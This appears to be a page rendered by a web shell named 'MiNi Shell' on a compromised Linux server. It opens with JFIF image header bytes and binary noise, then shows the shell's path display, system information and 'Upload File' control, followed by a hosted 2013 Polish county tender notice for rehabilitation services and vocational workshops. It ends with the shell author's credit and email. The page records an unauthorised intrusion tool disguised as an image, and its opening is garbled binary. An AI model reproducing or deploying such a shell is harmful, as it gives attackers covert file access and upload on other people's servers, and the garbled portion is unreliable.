JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130705/261558-N-2013.html

<p class="kh_header"><b>Bielsko-Biała: Organizacja i przeprowadzenie form wsparcia w ramach realizowanego projektu pt. Droga do aktywności - aktywizacja społeczna i zawodowa mieszkańców powiatu bielskiego, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.2 
Program Operacyjny Kapitał Ludzki współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 261558 - 2013; data zamieszczenia: 05.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Bielski , ul. Piastowska 40, 43-300 Bielsko-Biała, woj. śląskie, tel. 033 8136800, faks 033 8220672.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.bielsko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie form wsparcia w ramach realizowanego projektu pt. Droga do aktywności - aktywizacja społeczna i zawodowa mieszkańców powiatu bielskiego, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.2 
Program Operacyjny Kapitał Ludzki współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 

Organizacja i przeprowadzenie form wsparcia w ramach realizowanego projektu pt. Droga do aktywności - aktywizacja społeczna i zawodowa mieszkańców powiatu bielskiego, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.2 Program Operacyjny Kapitał Ludzki współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.

Ze względu na udział Uczestników/Uczestniczek w różnych formach wsparcia oraz inne ograniczenia ich dostępności (np. zajęcia szkolne) Zamawiający zastrzega sobie prawo do ustalenia ostatecznego kształtu harmonogramu zajęć w dniu podpisania umowy z Wykonawcą oraz wprowadzania korekt w tymże harmonogramie.

Wykonawca musi prowadzić realizację przedmiotu zamówienia zgodnie 
z Wytycznymi w zakresie kwalifikowania wydatków w ramach programu Operacyjnego Kapitał Ludzki z dnia 14 sierpnia 2012r. zamieszczonymi na stronie www.efs.slaskie.pl.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0, 85.31.25.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie w/w warunku, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponować osobami zdolnymi do wykonania zamówienia w tym:

- dla części nr: I przynajmniej 1 osoba posiadająca wykształcenie co najmniej wyższe magisterskie o kierunku fizykoterapia, fizjoterapia lub rehabilitacja oraz posiada minimum 2 letnie doświadczenie pracy w zawodzie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy :
dla części nr I  Załącznik nr 1a do SIWZ;
dla części nr II Załącznik nr 1b do SIWZ;
dla części nr III Załącznik nr 1c do SIWZ;
dla części nr IV Załącznik nr 1d do SIWZ;
dla części nr V Załącznik nr 1e do SIWZ;
dla części nr VI Załącznik nr 1f do SIWZ;
dla części nr VII Załącznik nr 1g do SIWZ;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Na podstawie art. 144 ust.1 Ustawy Prawo Zamówień Publicznych Zamawiający dopuszcza możliwość wprowadzenia zmian postanowień zawartej umowy 
w stosunku do treści przedłożonej w postępowaniu oferty, na podstawie, której dokonano wyboru Wykonawcy w następujących przypadkach: 
1)uzasadnionej konieczności zmiany osób (np. choroba), które będą uczestniczyć 
w wykonywaniu umowy na inne legitymujące się co najmniej równoważnymi kwalifikacjami zawodowymi, doświadczeniem, wykształceniem, które było wymagane przez Zamawiającego w SIWZ i w ogłoszeniu - dla części nr I postępowania,
2)konieczności przesunięcia terminu realizacji przedmiotu zamówienia z przyczyn leżących po stronie Zamawiającego, a dotyczących uczestników/uczestniczek projektu,
3)konieczności zmniejszenia/zwiększenia ilości osób skierowanych,
4)konieczności zmniejszenia/zwiększenia liczby realizowanych godzin,
5)zmiany miejsca realizacji przedmiotu zamówienia, pod warunkiem spełnienia kryteriów szczegółowo opisanych w SIWZ - dla części nr II, III, IV, V, VI oraz VII postępowania 
6)zmiany osób występujących po stronie Zamawiającego lub Wykonawcy, o których mowa w §6 umowy,
7)zmiany adresu/siedziby Zamawiającego lub Wykonawcy.
2.Przesłanki zmiany umowy dotyczące ppkt 3 i 4, nie mogą wynikać z przyczyn leżących po stronie Wykonawcy, jak również muszą być jedynymi okolicznościami uzasadniającymi taką zmianę.
3.Wszelkie zmiany i uzupełnienia treści umowy wymagają formy pisemnej pod rygorem ich nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.bielsko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Bielsku-Białej 
43-300 Bielsko-Biała, ul. Piastowska 40, pok. 202, II piętro bud. A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.07.2013 godzina 08:45, miejsce: Powiatowe Centrum Pomocy Rodzinie w Bielsku-Białej 
43-300 Bielsko-Biała, ul. Piastowska 40, pok. 202, II piętro bud. A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Pprojekt pt. Droga do aktywności - aktywizacja społeczna i zawodowa mieszkańców powiatu bielskiego, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.2 Program Operacyjny Kapitał Ludzki współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie indywidualnych usług rehabilitacyjnych dla uczestników/uczestniczek projektu -  mieszkańców/mieszkanek powiatu bielskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce realizacji usługi - miejsce zamieszkania niepełnosprawnego uczestnika/uczestniczki projektu na terenie Powiatu Bielskiego.
Liczba planowanych godzin rehabilitacji dla skierowanych uczestników/uczestniczek
Max.: 300 godzin zegarowych
Min.: 150 godzin zegarowych

Dodatkowe wymagania:
- prowadzenie indywidualnych kart świadczonych usług,
- przeprowadzenie wśród uczestników/uczestniczek ankiet ewaluacyjnych na zakończenie usługi.
Wzory w/w dokumentów przekazuje Zamawiający.
Przewidujemy rozliczenie za każdą zrealizowaną godzinę usługi rehabilitacyjnej.
Zamawiający dopuszcza możliwość zwiększenia lub zmniejszenia liczby godzin. 

Cena usługi powinna zawierać koszty dojazdu rehabilitanta do miejsca zamieszkania osoby korzystającej z rehabilitacji. Uwaga: samo świadczenie usługi powinno trwać 1 godzinę zegarową w miejscu zamieszkania osoby rehabilitowanej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 11.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie warsztatu stacjonarnego Sztuka gotowania w wymiarze 40 godzin/osobę..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Godzina szkoleniowa = 45 minut. 
Zajęcia odbywać się będą w 4 grupach, w tym:
1 grupa poranna: wtorki, czwartki 6 spotkań po 6h i jeden piątek 4h (15.11.2013r.) 
w terminie od 5.11.2013r. do 21.11.2013r.
2 grupa poranna: poniedziałki, środy, piątki 6 spotkań po 6h i jedna środa 4h w terminie 
od 8.11.2013r. do 27.11.2013r. 
3 grupa popołudniowa (w tygodniu rozpoczęcie zajęć nie wcześniej niż o 15.30, a w soboty zajęcia mogą odbywać się od rana):  wtorki, czwartki 7 spotkań po 4h i dwie soboty po 6h 
w terminie od 12.11.2013r. do 3.12.2013r.
4 grupa popołudniowa (w tygodniu rozpoczęcie zajęć nie wcześniej o 15.30):  poniedziałki, środy, piątki 10 spotkań po 4h w terminie od 8.11.2013r. do 2.12.2013r.
Uczestnikami/Uczestniczkami warsztatu będą osoby z terenu Powiatu Bielskiego, w tym osoby niepełnosprawne (brak os. poruszających się na wózkach). 
Miejsce realizacji usługi: powinno być zlokalizowane na terenie miasta Bielsko-Biała.
Możliwość realizacji usługi w dniach: od poniedziałku do soboty z uwzględnieniem powyższych wytycznych.
Maksymalna liczba osób skierowanych: 34
Minimalna liczba osób skierowanych: 27
Zamawiający nie dopuszcza łączenia skierowanych uczestników/uczestniczek z innymi osobami spoza projektu.
Szczegółowy opis znajduje się w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 05.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie warsztatu stacjonarnego Sztuka użytkowa w wymiarze 20 godzin..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Godzina szkoleniowa = 45 minut. 
Zajęcia odbywać się będą w 2 grupach, w tym:
1 grupa poranna: piątki, soboty po 4h  w terminie od 4.10.2013r. do 18.10.2013r.
2 grupa popołudniowa: piątki, soboty po 4h  w terminie od 4.10.2013r. do 18.10.2013r.
Uczestnikami/Uczestniczkami warsztatu będą osoby z terenu Powiatu Bielskiego, w tym osoby niepełnosprawne (brak os. poruszających się na wózkach). 
Miejsce realizacji usługi powinno być zlokalizowane na terenie miasta Bielsko-Biała.
Możliwość realizacji usługi w dniach: z uwzględnieniem powyższych wytycznych
Maksymalna liczba osób skierowanych: 15
Minimalna liczba osób skierowanych: 10
Zamawiający nie dopuszcza łączenia skierowanych uczestników/uczestniczek z innymi osobami spoza projektu.
Szczegółowy opis znajduje się w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 04.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie warsztatu stacjonarnego Ogrodnik terenów zielonych w wymiarze 40 godzin..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Godzina szkoleniowa = 45 minut. 
Zajęcia odbywać się będą w 2 grupach, w tym:
1 grupa poranna: piątki, soboty po 6h i jedno spotkanie 4h  w terminie od 6.09.2013r. do 28.09.2013r.
2 grupa popołudniowa: piątki, soboty po 6h i jedno spotkanie 4h  w terminie od 6.09.2013r. do 28.09.2013r.
Uczestnikami/Uczestniczkami warsztatu będą osoby z terenu Powiatu Bielskiego, w tym osoby niepełnosprawne (brak os. poruszających się na wózkach). 
Miejsce realizacji usługi powinno być zlokalizowane na terenie miasta Bielsko-Biała i Powiatu Bielskiego.
Możliwość realizacji usługi w dniach: z uwzględnieniem powyższych wytycznych
Maksymalna liczba osób skierowanych: 20
Minimalna liczba osób skierowanych: 14
Zamawiający nie dopuszcza łączenia skierowanych uczestników/uczestniczek z innymi osobami spoza projektu.
Szczegółowy opis znajduje sie w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 06.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie warsztatu stacjonarnego Sztuka barmańska i baristyczna w wymiarze 32 godzin..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Godzina szkoleniowa = 45 minut. 
Zajęcia odbywać się będą w soboty i niedziele w następujących terminach: 
9-10.11.2013r., 23-24.11.2013r., 7-8.12.2013r. w godzinach porannych (4 spotkania po 5h i 2 spotkania po 6 godzin).
Uczestnikami/Uczestniczkami warsztatu będą osoby z terenu Powiatu Bielskiego, w tym osoby niepełnosprawne (brak os. poruszających się na wózkach). 
Miejsce realizacji usługi powinno być zlokalizowane na terenie miasta Bielsko-Biała.
Możliwość realizacji usługi w dniach: z uwzględnieniem powyższych wytycznych
Maksymalna liczba osób skierowanych: 13
Minimalna liczba osób skierowanych: 7
Zamawiający nie dopuszcza łączenia skierowanych uczestników/uczestniczek z innymi osobami spoza projektu.
Szczegółowy opis znajduje się w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 09.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie warsztatu stacjonarnego Warsztaty wizażu i stylizacji w wymiarze 32 godzin..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Godzina szkoleniowa = 45 minut. 
Zajęcia odbywać się będą w soboty i niedziele w następujących terminach: 
19 -20.10.2013r., 26-27.10.2013r., 4 spotkania po 8h .
Uczestnikami/Uczestniczkami warsztatu będą osoby z terenu powiatu bielskiego, w tym osoby niepełnosprawne (brak os. poruszających się na wózkach). 
Miejsce realizacji usługi powinno być zlokalizowane na terenie miasta Bielsko-Biała.
Możliwość realizacji usługi w dniach: z uwzględnieniem powyższych wytycznych
Maksymalna liczba osób skierowanych: 10
Minimalna liczba osób skierowanych: 5
Zamawiający nie dopuszcza łączenia skierowanych uczestników/uczestniczek z innymi osobami spoza projektu.
Szczegółowy opis znajduje się w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 19.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie warsztatu stacjonarnego Warsztaty masażu z elementami odnowy biologicznej w wymiarze 40 godzin..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Godzina szkoleniowa = 45 minut. 
Zajęcia odbywać się będą w 2 grupach, w tym:
1 grupa poranna:  od poniedziałku do piątku w terminie od 2.12.2013r. do 10.12.2013r. 
(6 spotkań po 6h i jedno 4h)
2 grupa popołudniowa: od poniedziałku do piątku z wyłączeniem soboty (7.12.2013r.)
 w terminie od 4.12.2013r. do 14.12.2013r. (8 spotkań po 4h i jedno spotkanie w sobotę 8h).
Uczestnikami/Uczestniczkami warsztatu będą osoby z terenu Powiatu Bielskiego, w tym osoby niepełnosprawne (brak os. poruszających się na wózkach). 
Miejsce realizacji usługi powinno być zlokalizowane na terenie miasta Bielsko-Biała.
Możliwość realizacji usługi w dniach: z uwzględnieniem powyższych wytycznych
Maksymalna liczba osób skierowanych: 18
Minimalna liczba osób skierowanych: 12
Zamawiający nie dopuszcza łączenia skierowanych uczestników/uczestniczek z innymi osobami spoza projektu.
Szczegółowy opis znajduje się w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com